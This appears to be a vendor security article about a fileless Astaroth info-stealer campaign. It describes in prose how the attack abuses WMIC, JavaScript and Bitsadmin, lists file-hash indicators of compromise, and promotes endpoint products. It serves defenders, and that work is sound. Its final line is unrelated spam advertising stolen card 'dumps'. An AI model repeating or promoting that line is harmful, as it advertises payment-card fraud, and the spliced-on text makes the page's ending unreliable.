The Microsoft Defender ATP Research Team released a report covering a malware campaign that dropped the Astaroth trojan into the memory of infected computers. This particular campaign was notable in its distribution method and complex attack chain. It used fileless distribution techniques to hide its activities from security solutions, and abused different legitimate Windows software features to spread quietly.
Discovered in 2017, Astaroth is known as an information stealer. It is capable of taking sensitive information from an affected user — account credentials, keystrokes, and other data — and sending it to the attacker.
During a standard telemetry review, a researcher from the Microsoft Defender ATP Research Team, Andrea Lelli, noted a spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script, which indicated a fileless technique being used. Upon further investigation, Lelli discovered the Astaroth campaign where attackers were attempting to install the malware directly in the memory of victim devices.
Lelli explains that the infection typically starts through spam emails with a malicious URL to a LNK file shortcut. If the file is clicked, WMIC is run and allows the download and execution of a JavaScript code. The code in turn abuses the Bitsadmin tool to download payloads, and the eventual end payload is Astaroth. Lelli outlines the whole attack chain in the Microsoft report.
The malware campaign actually runs legitimate Windows tools, which will download additional code and then pass it on. This chain of action is executed in memory, without saving any files on the disk, making it a “fileless execution.” The fileless nature of the campaign makes it difficult for traditional antivirus tools to detect it, although more advanced security solutions are able to defend against such a threat.
[READ: Security 101: Defending Against Fileless Malware ]
Lelli notes that this malware campaign completely “lives off the land,” given that all files run during the attack chain are system tools. By abusing legitimate tools already present on the target system, it tries to disguise its actions as regular activity.
This use of fileless techniques is not new. In fact, in 2018, we saw an uptick in fileless events . And cybercriminals continue to use fileless techniques to update old malware.
But while fileless threats may not be as visible as more traditional ones, they leave telltale signs that can be detected by IT and security teams. Here are some ways enterprises can stay ahead of fileless threats:
To protect against fileless threats that use spam emails as vectors, enterprises can use the Trend Micro endpoint solutions Trend Micro Smart Protection Suites and Worry-Free ™ Business Security . Both solutions protect users and businesses from threats by detecting malicious files and spammed messages, and blocks all related malicious URLs.
Indicators of Compromise
762f962251800b0028a90b53a50503558fff9116c43fccdab376a05fdd03e27e
9cef4e4b27b956035107ae36dac44fc4bd0ed8e1ae7ae58d10708bae3de636a0
536d9ff73c183f5a4cf5c230f898b4e5b938c7a8bbd343edf818d5114eaf6521
90dcef5b84678f4a9491a1520cf43e17de5b97e13a1ad5d5609438deb8cf2a40
e44548f0c7d26a6d11f3ab29753e36f525559dc2e443bff96346f1be17cd644a
dcc9ba0819601b18b18e2594bca7e700938dfe85c6904feed1841852016decdb
6f8692f08ccd5ab46136fca179be23f67bffed8bbd61ea16276be4268db404f2
3e70e0c3a10855aa6f8bf13391ce91bdefcd78a7c3e67c93c0e6e040088d604f
d64d1c73460746d08e45fd97f29d1e464809fcfc869d3a6831b90897ca99e83c
314befd15c890bdec036ccfeba1248417a0b204f49b342ac6727c07756ec9eae
8f2158344f9df9dd011a4e76749e4a8f46a556a4110b796561855c5bbabd766a
Like it? Add this infographic to your site:1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.
In the first half of this year, cybersecurity strongholds were surrounded by cybercriminals waiting to pounce at the sight of even the slightest crack in defenses to ravage valuable assets. View the report
The upheavals of 2020 challenged the limits of organizations and users, and provided openings for malicious actors. A robust cybersecurity posture can help equip enterprises and individuals amid a continuously changing threat landscape. View the 2020 Annual Cybersecurity Report
legit dumps with pin best cc dump sites